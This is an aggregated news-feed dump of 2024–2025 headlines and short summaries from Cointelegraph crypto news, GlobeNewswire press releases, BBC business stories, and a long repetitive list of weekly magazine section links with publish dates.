Hurwitz told Cointelegraph that stablecoins have seen “explosive” adoption, adding that they are “becoming the default settlement layer for the internet.”

Companies like PayPal and Stripe are integrating stablecoins to leverage onchain infrastructure, enabling faster and cheaper transactions. “They’ve already surpassed Visa and Mastercard in onchain volume by 7%,” Hurwitz noted, signaling a decisive shift in how money moves online.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 15:07:29 +0100

Bitcoin price will make history with $109K weekly, monthly close

Bitcoin weekend volatility gets a late boost thanks to a familiar source with the key $109,000 BTC price closing level within easy reach.

Key points:

Bitcoin sees some weekend volatility as Hyperliquid’s notorious James Wynn flip-flops between short and long BTC.

Short timeframes show bulls staying “in control” of BTC price action.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 13:56:34 +0100

Binance ties to Kenyan crypto board raise monopoly concerns: Report

Kenya’s crypto startups fear a Binance-linked lobby group could tilt new regulations in the exchange’s favor under the proposed VASP bill.

Some crypto startups have raised concerns about Kenya’s proposed Virtual Asset Service Providers (VASP) Bill, warning that it could grant disproportionate influence to a Binance-linked lobby group and jeopardize fair competition in the country’s digital asset sector.

According to disclosures seen by The Kenyan Wall Street, a private think tank called the Virtual Asset Chamber of Commerce (VAC) will be included on the regulatory board established under the draft law.

Some crypto stakeholders in Kenya claim that VAC has run Binance-sponsored regulatory talks, lacks independence and acts as a proxy for the exchange.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 10:27:23 +0100

27% of Koreans aged 20–50 hold crypto, 70% eye more investments: Report

More than 25% of South Koreans aged 20 to 50 now hold crypto, and 70% plan to increase their investments as digital assets become a key part of retirement planning.

More than a quarter of South Koreans in their 20s to 50s now own digital assets, with their crypto investments making up 14% of their total financial portfolios, according to a new report from the Hana Institute of Finance released Sunday.

The study, titled “2050 Generation’s Virtual Asset Investment Trends,” shows that interest in crypto cuts across age groups. Those in their 40s led participation at 31%, followed by people in their 30s at 28% and 50s at 25%.

Of respondents in their 50s, 78% said they use crypto as a way to amass funds, while 53% said they were preparing for retirement through crypto investments. More respondents now cite growth potential, diversification and structured savings plans as key motivations for investing.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 08:18:08 +0100

Bitcoin is ‘bad for dictators’: Human Rights Foundation exec

Human Rights Foundation’s Alex Gladstein told a group of US political leaders that Bitcoin has “essentially saved” citizens living under dictatorships.

A Human Rights Foundation executive told a room full of US politicians that Bitcoin (BTC) continues to prove itself as a powerful tool against authoritarian control, offering an alternative to the mounting ways fiat currency can be manipulated and controlled.

“With Bitcoin, the ability of these leaders to do these things is completely decimated,” Human Rights Foundation chief strategy officer Alex Gladstein said at the Bitcoin Policy Summit in Washington, D.C. on Thursday.

“Bitcoin is bad for dictators,” he added.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 07:04:08 +0100

News Ticker - markets.businessinsider.com

EQS-CMS: Scout24 SE: Release of a capital market information

<table border="0"><tr><td> EQS Post-admission Duties announcement: Scout24 SE / Announcement corresponding to Art. 5 para. 1 lit. b), para. 3 of Regulation (EU) No 596/2014 in its current version and Art. 2 para. 3 of Delegated Regulation (EU) 2016/1052 <br/> Scout24 SE: Release of a capital market information...

Article link

Date of publish: Mon, 30 Jun 2025 12:09:03 GMT

Ashvattha Therapeutics Presents Positive Interim Phase 2 Results for Subcutaneous Migaldendranib Treatment for DME and Wet-AMD at 2025 MaculArt Meeting

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="center"><em>Monthly subcutaneous migaldendranib shows favorable safety with sustained efficacy through 24 weeks in patients with DME and wet-AMD </em><p align="center"><em>Novel subcutaneous delivery may offer a more patient-friendly...

Article link

Date of publish: Mon, 30 Jun 2025 12:05:00 GMT

HighPeak Energy, Inc. Announces Proposed Aggregate $725 Million Private Offering of Senior Notes

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="justify">FORT WORTH, Texas, June 30, 2025 (GLOBE NEWSWIRE) -- HighPeak Energy, Inc. ("HighPeak" or the "Company") (NASDAQ: HPK) today announced that it intends to offer, subject to market and customary conditions, $725 million aggregate...

Article link

Date of publish: Mon, 30 Jun 2025 12:01:41 GMT

Kneat Announces Upcoming Change to its Senior Leadership

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="left">LIMERICK, Ireland, June 30, 2025 (GLOBE NEWSWIRE) -- kneat.com, inc. (TSX: KSI) (OTCQC: KSIOF) , a leader in digitizing and automating validation and quality processes, announces a change to its senior leadership team.

Article link

Date of publish: Mon, 30 Jun 2025 12:01:21 GMT

Abacus Global Management Announces Commencement of Exchange Offer and Consent Solicitation Relating to Warrants

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />ORLANDO, Fla., June 30, 2025 (GLOBE NEWSWIRE) -- Abacus Global Management, Inc. ("Abacus" or the "Company") (NASDAQ: ABL), a leader in the alternative asset management space, today announced that it has commenced an exchange offer (the "Offer")...

Article link

Date of publish: Mon, 30 Jun 2025 12:00:39 GMT

23andMe Receives Court Approval for Sale to TTAM Research Institute, a Nonprofit Public Benefit Corporation

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="left">SAN FRANCISCO, June 30, 2025 (GLOBE NEWSWIRE) -- 23andMe Holding Co. ("23andMe" or the "Company") (OTC: MEHCQ), a genetics-led consumer healthcare company, today announced that it has received approval from the U.S. Bankruptcy...

Article link

Date of publish: Mon, 30 Jun 2025 12:00:05 GMT

BitMEX Study Reveals 90% Drop in Extreme Bitcoin Perpetual Futures Funding Rates Since 2016, Signalling Market Maturation

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="center"><img alt="BitMEX Study Reveals 90% Drop in Extreme Bitcoin Perpetual Futures Funding Rates Since 2016, Signalling Market Maturation" height="338" name="GNW_RichHtml_External_IMG"...

Article link

Date of publish: Mon, 30 Jun 2025 12:00:00 GMT

Gentex Schedules Second Quarter 2025 Earnings Release Date and Conference Call

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="left">ZEELAND, Mich., June 30, 2025 (GLOBE NEWSWIRE) -- Gentex Corporation (NASDAQ: GNTX), the Zeeland, Michigan-based supplier of digital vision, connected car, dimmable glass, fire protection technologies and consumer electronics, is...

Article link

Date of publish: Mon, 30 Jun 2025 12:00:00 GMT

Go-Ahead Group and BetterFleet Launch Europe’s Largest EV Charge Management Deployment

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />LONDON, June 30, 2025 (GLOBE NEWSWIRE) -- As one of the largest and most complex deployments of advanced charge management software globally, <a...

Article link

Date of publish: Mon, 30 Jun 2025 12:00:00 GMT

SPR Receives Fourth Consecutive Northeast Ohio Top Workplaces Award

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="center"><em>- Based on employee feedback highlighting strong corporate culture -</em>CLEVELAND, June 30, 2025 (GLOBE NEWSWIRE) -- For the fourth year in a row, SPR has been recognized as a Top Workplace by Northeast Ohio Top Workplaces.

Article link

Date of publish: Mon, 30 Jun 2025 12:00:00 GMT

BBC News

Lifetime ISAs leave some with less money than they put in

MPs call for reform to the savings account which aims to help people save towards retirement or a first home.

Article link

Date of publish: Mon, 30 Jun 2025 12:23:20 GMT

Calls for inquiry as 420 refinery jobs at risk

The government says workers at the Lindsey plant in Lincolnshire have been "badly let down".

Article link

Date of publish: Mon, 30 Jun 2025 14:18:04 GMT

Boeing's 787 Dreamliner was deemed the 'safest' of planes. The whistleblowers were always less sure

Long before the Air India tragedy, the cause of which is still to be determined, people who had worked on the 787 had raised concerns about the production standards

Article link

Date of publish: Sun, 29 Jun 2025 22:57:37 GMT

Welfare concessions to be set out before key vote

Ministers hope to reassure wavering MPs after a rebellion over benefits cuts led to a major climbdown.

Article link

Date of publish: Mon, 30 Jun 2025 13:33:40 GMT

Prada acknowledges footwear design's Indian roots after backlash

Prada described the Kolhapuri sandals as "leather footwear" but did not mention its origins, prompting backlash.

Article link

Date of publish: Mon, 30 Jun 2025 08:24:48 GMT

The global environmental award hit by accusations of greenwashing

US business Dr Bronner's has criticised the B Corp scheme for allowing in too many multinationals.

Article link

Date of publish: Sun, 29 Jun 2025 23:02:03 GMT

Tech firms face demands to stop illegal content going viral

UK regulator Ofcom is consulting on more safety measures for online platforms, such as preventing screen-records of children's livestreams.

Article link

Date of publish: Mon, 30 Jun 2025 13:21:49 GMT

Canada drops tech tax to restart US trade talks

A new tax on technology firms is being halted after Trump threatened new tariffs on Canadian goods.

Article link

Date of publish: Mon, 30 Jun 2025 13:19:25 GMT

UK-US tariff deal begins but still no news on steel

The deal will give the UK motor industry preferential treatment and cut aerospace tariffs to zero.

Article link

Date of publish: Mon, 30 Jun 2025 12:33:31 GMT

London to Brighton line faces delays in heatwave

Network Rail is introducing speed restrictions and a revised timetable for Monday and Tuesday.

Article link

Date of publish: Mon, 30 Jun 2025 05:13:18 GMT

MP asks Lotus to give clarity to 1,300 workers

Ben Goldsborough says he met with Geely on Monday and emphasised the need for "openness".

Article link

Date of publish: Mon, 30 Jun 2025 13:26:01 GMT

Trump says he has 'a group of very wealthy people' to buy TikTok

Trump says he thinks China's president will probably approve a sale to the unidentified group.

Article link

Date of publish: Sun, 29 Jun 2025 18:52:21 GMT

Make healthy food more appealing, government tells supermarkets

Supermarkets will be challenged to sell healthier food, under a new government obesity plan.

Article link

Date of publish: Sun, 29 Jun 2025 13:42:04 GMT

Uber's dynamic pricing means higher fares and lower earnings for drivers, study finds

A University of Oxford study says Uber's dynamic pricing algorithm has seen drivers income decrease.

Article link

Date of publish: Sun, 29 Jun 2025 06:27:37 GMT

Plans to help benefits recipients into work 'a mess', say DWP officials

Plans to help those affected by benefits cuts into work are not "properly considered", officials tell the BBC.

Article link

Date of publish: Fri, 27 Jun 2025 17:03:37 GMT

'We have all the cards' - Trump says he is ending Canada trade talks

Canada had been hoping to secure a trade deal with the US next month to avoid steep tariffs.

Article link

Date of publish: Fri, 27 Jun 2025 20:19:38 GMT

Lotus has 'no plans' to close any car factory

The firm's Chinese owner tells the government it is committed to the UK but said it is exploring options.

Article link

Date of publish: Sun, 29 Jun 2025 14:23:50 GMT

The benefits U-turn raises questions about the credibility of Labour's long-term plan

The Government is boxed in from this week's events - and lacks the Houdini skills to escape, says the BBC's Faisal Islam

Article link

Date of publish: Fri, 27 Jun 2025 23:33:47 GMT

Faisal Islam: How much will U-turn on disability benefits cost?

The changes could cost up to £3bn which will have to come from higher taxes or cuts elsewhere, given the chancellor's self-imposed borrowing rules.

Article link

Date of publish: Fri, 27 Jun 2025 11:43:15 GMT

Starmer U-turns on benefits cuts after Labour backlash

Cuts to some disability benefits will only hit future claimants, not those already on it.

Article link

Date of publish: Fri, 27 Jun 2025 11:17:40 GMT

Should we be letting flies eat our food waste?

In Lithuania and Australia, hungry fly larvae are used to process food waste into useful protein.

Article link

Date of publish: Thu, 26 Jun 2025 23:10:12 GMT

Nissan Sunderland looking to cut 250 jobs

A spokesperson said the Sunderland plant remained 'at the forefront of our electrification strategy'.

Article link

Date of publish: Fri, 27 Jun 2025 12:13:18 GMT

Post Office criminal trials unlikely before 2028, says police chief

The police will not hand files to prosecutors until after the final report from the public inquiry into the scandal is published.

Article link

Date of publish: Thu, 26 Jun 2025 23:03:20 GMT

UK car production plunges to 76-year low for May

Exports to the US halved as President Donald Trump's tariffs caused some UK car makers to halt shipments.

Article link

Date of publish: Fri, 27 Jun 2025 08:45:17 GMT

Nike pledges to cut reliance on Chinese factories

Company executives say the sportwear giant will cut its reliance on producing goods in China to ease the impact of US trade policies.

Article link

Date of publish: Fri, 27 Jun 2025 11:50:20 GMT

'We can't do without these people': Trump's migrant crackdown has businesses worried

President Donald Trump's crackdown on immigrants could have serious economic repercussions.

Article link

Date of publish: Fri, 27 Jun 2025 07:46:05 GMT

UK's data agency has 'deep seated' issues, review finds

Problems at the Office for National Statistics, which provides data informing policy decisions affecting millions, need to be addressed so it can rebuild its reputation, a review says.

Article link

Date of publish: Thu, 26 Jun 2025 17:00:56 GMT

Why your old mobile phone may be polluting Thailand

The Asian nation is importing thousands of tonnes of electronic waste per year, despite a ban.

Article link

Date of publish: Thu, 26 Jun 2025 06:43:54 GMT

Supercell boss: 'We need to take bigger risks'

The boss of mobile gaming giant Supercell says the industry needs to take bigger risks to compete.

Article link

Date of publish: Mon, 23 Jun 2025 23:08:19 GMT

Russia's economy is down but not out

The country's economy has been surprisingly resilient but there are underlying problems.

Article link

Date of publish: Mon, 23 Jun 2025 06:07:33 GMT

Tech giants unleash AI on weather forecasts: are they any good?

The biggest tech firms are using AI to forecast the weather but is that better than existing models?

Article link

Date of publish: Thu, 19 Jun 2025 23:02:58 GMT

Why Ukraine is one of the world's most digital countries

Despite the war, Ukraine has developed of the most advanced systems for digital government services.

Article link

Date of publish: Mon, 16 Jun 2025 23:16:55 GMT

Can shoes be made in the US without cheap labour?

American production is possible, but it often needs to be automated to be cost effective.

Article link

Date of publish: Mon, 16 Jun 2025 00:07:49 GMT

Race to mine metals for EV batteries threatens marine paradise

Photographs appear to show how nickel mining damaged one the world's most diverse marine environments

Article link

Date of publish: Sun, 15 Jun 2025 00:29:33 GMT

The women at the centre of Somalia's construction boom

Mogadishu's rapid expansion after decades of war is giving unexpected opportunities in a male-dominated society.

Article link

Date of publish: Sun, 15 Jun 2025 00:53:06 GMT

Indian scientists search for the perfect apple

India can't grow enough apples to meet demand but farmers are struggling to raise production.

Article link

Date of publish: Thu, 12 Jun 2025 23:05:53 GMT

A Belgrade landmark bombed by Nato could get Trump makeover

The Serbian project, led by Trump's son-in-law Jared Kushner, has run into opposition and scandal.

Article link

Date of publish: Wed, 11 Jun 2025 23:12:36 GMT

US tariff turmoil makes Spain's flagship foods seek other markets

Spanish ham and olive oil producers are looking at other nations to replace sales in the US.

Article link

Date of publish: Tue, 10 Jun 2025 23:07:17 GMT

From festivals to weddings: Why drone shows are booming

Light shows involving hundreds and even thousands of drones are becoming big attractions.

Article link

Date of publish: Mon, 09 Jun 2025 23:01:54 GMT

Why food firms are scrambling to cut down on ingredients

Food firms are marketing ranges with fewer ingredients, but are they healthier?

Article link

Date of publish: Fri, 06 Jun 2025 14:05:19 GMT

How airline fees have turned baggage into billions

The amount carriers now charge for luggage is raising the ire of politicians and consumer groups.

Article link

Date of publish: Wed, 04 Jun 2025 23:01:27 GMT

The British jet engine that failed in the 'Valley of Death'

Workers at Reaction Engines felt they were close to completing a revolutionary jet engine.

Article link

Date of publish: Mon, 02 Jun 2025 23:04:45 GMT

Chile's salmon farms hope for calmer waters

Chilean salmon producers are being criticised for operating in some of the country's national parks.

Article link

Date of publish: Wed, 28 May 2025 23:06:39 GMT

'We make more money from weddings now than farming'

From falconry and helicopter rides to spas and solar farms, three quarters of farmers now have a side hustle.

Article link

Date of publish: Tue, 27 May 2025 23:29:27 GMT

Frugal tech: The start-ups working on cheap innovation

Indian start-ups are using local materials and innovative ideas to make useful and affordable products.

Article link

Date of publish: Mon, 26 May 2025 23:03:01 GMT

Winemakers finding Trump's tariffs hard to swallow

Wine producers in both France and the US are unhappy at the US president's trade actions.

Article link

Date of publish: Sun, 25 May 2025 23:11:04 GMT

'How can people afford to have kids?'

In a city where the birth rate has fallen by a third in a decade, many blame financial pressures.

Article link

Date of publish: Sun, 29 Jun 2025 06:21:34 GMT

Has video gaming become too expensive?

With new games reaching record prices, some gamers fear their hobby is becoming unaffordable.

Article link

Date of publish: Sat, 28 Jun 2025 14:33:06 GMT

'New video games cost me a whole day's wages'

With new games reaching record prices, some gamers fear their favourite hobby is becoming unaffordable.

Article link

Date of publish: Sat, 28 Jun 2025 13:06:32 GMT

Plans to help benefits recipients into work 'a mess', say DWP officials

Plans to help those affected by benefits cuts into work are not "properly considered", officials tell the BBC.

Article link

Date of publish: Fri, 27 Jun 2025 17:03:37 GMT

Welfare cuts: What are the Pip and universal credit changes?

The planned changes to the benefits system will affect future claimants, not current claimants.

Article link

Date of publish: Fri, 27 Jun 2025 11:33:52 GMT

China's electric cars are becoming slicker and cheaper - but is there a deeper cost?

The future for EVs will inevitably involve China. But where does that leave the UK and Europe markets – and what of the questions around national security?

Article link

Date of publish: Mon, 09 Jun 2025 23:04:10 GMT

The secretive US factory that lays bare the contradiction in Trump's America First plan

An exclusive look inside the closely guarded factory the president wants to become a foundation stone for a US golden age.

Article link

Date of publish: Sun, 18 May 2025 21:55:21 GMT

Xi's real test is not Trump's trade war

The real battleground of the current trade war might be China's domestic economy

Article link

Date of publish: Wed, 30 Apr 2025 05:40:17 GMT

The curious case of why a billionaire wants to buy Royal Mail

From the end of April, the 500-year-old Royal Mail will be controlled by Czech billionaire Daniel Kretinsky who co-owns a football club - but why does he want it?

Article link

Date of publish: Sun, 13 Apr 2025 23:27:04 GMT

Trump has turned his back on the foundation of US economic might - the fallout will be messy

What made the US step back from the system that it profited handsomely from for decades?

Article link

Date of publish: Sat, 05 Apr 2025 23:59:04 GMT

'Everybody knew the welfare reform bill was a £5bn cut'

Economics Editor Faisal Islam on what was really behind the big rebellion about the government's welfare reform bill, after the government confirmed it will make major concessions.

Article link

Date of publish: Mon, 30 Jun 2025 13:00:45 GMT

The Briefing Room

From McKinley to Trump, the rise, fall and rise again of US tariffs.

Article link

Date of publish: Thu, 05 Jun 2025 15:00:00 GMT

The world this week

The weekly cartoon

Article link

Date of publish: Thu, 26 Jun 2025 12:43:33 +0000

Business

Article link

Date of publish: Thu, 26 Jun 2025 12:43:33 +0000

Politics

Article link

Date of publish: Thu, 26 Jun 2025 12:43:33 +0000

Cover Story newsletter: How we chose the cover image

Article link

Date of publish: Fri, 20 Jun 2025 15:51:21 +0000

The weekly cartoon

Article link

Date of publish: Thu, 19 Jun 2025 12:57:40 +0000

Business

Article link

Date of publish: Thu, 19 Jun 2025 12:57:40 +0000

Politics

Article link

Date of publish: Thu, 19 Jun 2025 12:57:40 +0000

Cover Story newsletter: How we chose the cover image

Article link

Date of publish: Fri, 13 Jun 2025 16:33:16 +0000

Business

Article link

Date of publish: Thu, 12 Jun 2025 13:00:23 +0000

The weekly cartoon

Article link

Date of publish: Thu, 12 Jun 2025 13:00:23 +0000

Politics

Article link

Date of publish: Thu, 12 Jun 2025 13:00:23 +0000

Cover Story newsletter: How we chose the cover image

Article link

Date of publish: Fri, 06 Jun 2025 18:50:45 +0000

The weekly cartoon

Article link

Date of publish: Thu, 05 Jun 2025 12:46:22 +0000

Politics

Article link

Date of publish: Thu, 05 Jun 2025 12:46:22 +0000

Business

Article link

Date of publish: Thu, 05 Jun 2025 12:46:22 +0000

Cover Story newsletter: How we chose the cover image

Article link

Date of publish: Fri, 30 May 2025 17:44:37 +0000

The weekly cartoon

Article link

Date of publish: Thu, 29 May 2025 12:48:24 +0000

Politics

Article link

Date of publish: Thu, 29 May 2025 12:48:24 +0000

Business

Article link

Date of publish: Thu, 29 May 2025 12:48:24 +0000

Cover Story newsletter: How we chose the cover images

Article link

Date of publish: Fri, 23 May 2025 17:31:36 +0000

The weekly cartoon

Article link

Date of publish: Thu, 22 May 2025 12:47:13 +0000

Business

Article link

Date of publish: Thu, 22 May 2025 12:47:13 +0000

Politics

Article link

Date of publish: Thu, 22 May 2025 12:47:13 +0000

Cover Story newsletter: How we chose the cover images

Article link

Date of publish: Fri, 16 May 2025 18:20:02 +0000

The weekly cartoon

Article link

Date of publish: Thu, 15 May 2025 12:59:07 +0000

Politics

Article link

Date of publish: Thu, 15 May 2025 12:59:07 +0000

Business

Article link

Date of publish: Thu, 15 May 2025 12:59:07 +0000

The weekly cartoon

Article link

Date of publish: Thu, 08 May 2025 13:01:04 +0000

Business

Article link

Date of publish: Thu, 08 May 2025 13:01:04 +0000

Politics

Article link

Date of publish: Thu, 08 May 2025 13:01:04 +0000

The weekly cartoon

Article link

Date of publish: Thu, 01 May 2025 12:59:11 +0000

Politics

Article link

Date of publish: Thu, 01 May 2025 12:59:11 +0000

Business

Article link

Date of publish: Thu, 01 May 2025 12:59:11 +0000

The weekly cartoon

Article link

Date of publish: Thu, 24 Apr 2025 12:49:36 +0000

Business

Article link

Date of publish: Thu, 24 Apr 2025 12:49:36 +0000

Politics

Article link

Date of publish: Thu, 24 Apr 2025 12:49:36 +0000

The weekly cartoon

Article link

Date of publish: Wed, 16 Apr 2025 13:20:45 +0000

Politics

Article link

Date of publish: Wed, 16 Apr 2025 13:20:45 +0000

Business

Article link

Date of publish: Wed, 16 Apr 2025 13:20:45 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Wed, 16 Apr 2025 13:02:18 +0000

The weekly cartoon

Article link

Date of publish: Thu, 10 Apr 2025 12:53:53 +0000

Business

Article link

Date of publish: Thu, 10 Apr 2025 12:53:53 +0000

Politics

Article link

Date of publish: Thu, 10 Apr 2025 12:53:53 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 10 Apr 2025 11:31:31 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 03 Apr 2025 13:02:23 +0000

The weekly cartoon

Article link

Date of publish: Thu, 03 Apr 2025 13:02:23 +0000

Business

Article link

Date of publish: Thu, 03 Apr 2025 13:02:23 +0000

Politics

Article link

Date of publish: Thu, 03 Apr 2025 13:02:23 +0000

Business

Article link

Date of publish: Thu, 27 Mar 2025 15:49:30 +0000

Politics

Article link

Date of publish: Thu, 27 Mar 2025 15:49:30 +0000

The weekly cartoon

Article link

Date of publish: Thu, 27 Mar 2025 15:46:32 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 27 Mar 2025 15:26:51 +0000

The weekly cartoon

Article link

Date of publish: Thu, 20 Mar 2025 14:31:29 +0000

Business

Article link

Date of publish: Thu, 20 Mar 2025 14:31:29 +0000

Politics

Article link

Date of publish: Thu, 20 Mar 2025 14:31:29 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 20 Mar 2025 12:02:54 +0000

The weekly cartoon

Article link

Date of publish: Thu, 13 Mar 2025 14:45:26 +0000

Business

Article link

Date of publish: Thu, 13 Mar 2025 14:45:26 +0000

Politics

Article link

Date of publish: Thu, 13 Mar 2025 14:45:26 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 13 Mar 2025 12:30:57 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 06 Mar 2025 13:57:53 +0000

The weekly cartoon

Article link

Date of publish: Thu, 06 Mar 2025 13:57:53 +0000

Business

Article link

Date of publish: Thu, 06 Mar 2025 13:57:53 +0000

Politics

Article link

Date of publish: Thu, 06 Mar 2025 13:57:53 +0000

Business

Article link

Date of publish: Thu, 27 Feb 2025 15:24:09 +0000

The weekly cartoon

Article link

Date of publish: Thu, 27 Feb 2025 15:24:09 +0000

Politics

Article link

Date of publish: Thu, 27 Feb 2025 15:24:09 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 27 Feb 2025 13:42:30 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 20 Feb 2025 14:44:04 +0000

Business

Article link

Date of publish: Thu, 20 Feb 2025 13:58:41 +0000

The weekly cartoon

Article link

Date of publish: Thu, 20 Feb 2025 13:58:41 +0000

Politics

Article link

Date of publish: Thu, 20 Feb 2025 13:58:41 +0000

The weekly cartoon

Article link

Date of publish: Thu, 13 Feb 2025 14:42:19 +0000

Business

Article link

Date of publish: Thu, 13 Feb 2025 14:42:19 +0000

Politics

Article link

Date of publish: Thu, 13 Feb 2025 14:42:19 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 13 Feb 2025 13:01:42 +0000

The weekly cartoon

Article link

Date of publish: Thu, 06 Feb 2025 14:08:56 +0000

Business

Article link

Date of publish: Thu, 06 Feb 2025 14:08:56 +0000

Politics

Article link

Date of publish: Thu, 06 Feb 2025 14:08:56 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 06 Feb 2025 11:48:50 +0000

The weekly cartoon

Article link

Date of publish: Thu, 30 Jan 2025 15:42:32 +0000

Politics

Article link

Date of publish: Thu, 30 Jan 2025 15:42:32 +0000

Business

Article link

Date of publish: Thu, 30 Jan 2025 15:42:32 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 30 Jan 2025 12:05:51 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 23 Jan 2025 15:11:15 +0000

The weekly cartoon

Article link

Date of publish: Thu, 23 Jan 2025 14:31:04 +0000

Business

Article link

Date of publish: Thu, 23 Jan 2025 14:31:04 +0000

Politics

Article link

Date of publish: Thu, 23 Jan 2025 14:31:04 +0000

The weekly cartoon

Article link

Date of publish: Thu, 16 Jan 2025 15:17:32 +0000

Business

Article link

Date of publish: Thu, 16 Jan 2025 15:17:32 +0000

Politics

Article link

Date of publish: Thu, 16 Jan 2025 15:17:32 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 16 Jan 2025 12:39:17 +0000

Business

Article link

Date of publish: Thu, 09 Jan 2025 14:00:38 +0000

The weekly cartoon

Article link

Date of publish: Thu, 09 Jan 2025 14:00:38 +0000

Politics

Article link

Date of publish: Thu, 09 Jan 2025 14:00:38 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 09 Jan 2025 13:09:11 +0000

The world this week

Article link

Date of publish: Thu, 02 Jan 2025 14:06:25 +0000

The weekly cartoon

Article link

Date of publish: Thu, 02 Jan 2025 14:06:25 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 02 Jan 2025 13:10:05 +0000

Our Christmas cover

The story behind this year’s design

Article link

Date of publish: Thu, 19 Dec 2024 15:23:15 +0000

The world this year 2024

Article link

Date of publish: Thu, 19 Dec 2024 14:40:33 +0000

The weekly cartoon

Article link

Date of publish: Thu, 19 Dec 2024 14:40:33 +0000

The weekly cartoon

Article link

Date of publish: Thu, 12 Dec 2024 13:39:20 +0000

Business

Article link

Date of publish: Thu, 12 Dec 2024 13:39:20 +0000

Politics

Article link

Date of publish: Thu, 12 Dec 2024 13:39:20 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 12 Dec 2024 11:40:09 +0000

The weekly cartoon

Article link

Date of publish: Thu, 05 Dec 2024 13:48:39 +0000

Business

Article link

Date of publish: Thu, 05 Dec 2024 13:48:39 +0000

Politics

Article link

Date of publish: Thu, 05 Dec 2024 13:48:39 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 05 Dec 2024 11:39:26 +0000

Business

Article link

Date of publish: Thu, 28 Nov 2024 13:53:31 +0000

The weekly cartoon

Article link

Date of publish: Thu, 28 Nov 2024 13:53:31 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 28 Nov 2024 13:53:31 +0000

Politics

Article link

Date of publish: Thu, 28 Nov 2024 13:53:31 +0000

The weekly cartoon

Article link

Date of publish: Thu, 21 Nov 2024 13:52:31 +0000

Business

Article link

Date of publish: Thu, 21 Nov 2024 13:52:31 +0000

Politics

Article link

Date of publish: Thu, 21 Nov 2024 13:52:31 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 21 Nov 2024 12:26:15 +0000

The weekly cartoon

Article link

Date of publish: Thu, 14 Nov 2024 15:01:05 +0000

Business

Article link

Date of publish: Thu, 14 Nov 2024 15:01:05 +0000

Politics

Article link

Date of publish: Thu, 14 Nov 2024 15:01:05 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 14 Nov 2024 11:41:53 +0000

The weekly cartoon

Article link

Date of publish: Thu, 07 Nov 2024 14:13:37 +0000

Business

Article link

Date of publish: Thu, 07 Nov 2024 14:13:37 +0000

Politics

Article link

Date of publish: Thu, 07 Nov 2024 14:13:37 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 07 Nov 2024 12:30:04 +0000

Business

Article link

Date of publish: Thu, 31 Oct 2024 15:16:44 +0000

The weekly cartoon

Article link

Date of publish: Thu, 31 Oct 2024 15:16:44 +0000

Politics

Article link

Date of publish: Thu, 31 Oct 2024 15:16:44 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 31 Oct 2024 12:05:54 +0000

Business

Article link

Date of publish: Thu, 24 Oct 2024 13:34:21 +0000

The weekly cartoon

Article link

Date of publish: Thu, 24 Oct 2024 13:34:21 +0000

Politics

Article link

Date of publish: Thu, 24 Oct 2024 13:34:21 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 24 Oct 2024 11:34:47 +0000

Business

Article link

Date of publish: Thu, 17 Oct 2024 13:55:20 +0000

The weekly cartoon

Article link

Date of publish: Thu, 17 Oct 2024 13:55:20 +0000

Politics

Article link

Date of publish: Thu, 17 Oct 2024 13:55:20 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 17 Oct 2024 11:22:01 +0000

The weekly cartoon

Article link

Date of publish: Thu, 10 Oct 2024 13:24:39 +0000

Business

Article link

Date of publish: Thu, 10 Oct 2024 13:24:39 +0000

Politics

Article link

Date of publish: Thu, 10 Oct 2024 13:24:39 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 10 Oct 2024 11:40:52 +0000

The weekly cartoon

Article link

Date of publish: Thu, 03 Oct 2024 14:04:01 +0000

Business

Article link

Date of publish: Thu, 03 Oct 2024 14:04:01 +0000

Politics

Article link

Date of publish: Thu, 03 Oct 2024 14:04:01 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 03 Oct 2024 11:47:54 +0000

The weekly cartoon

Article link

Date of publish: Thu, 26 Sep 2024 13:33:10 +0000

Business

Article link

Date of publish: Thu, 26 Sep 2024 13:33:10 +0000

Politics

Article link

Date of publish: Thu, 26 Sep 2024 13:33:10 +0000

This week’s covers

How we saw the world

Article link

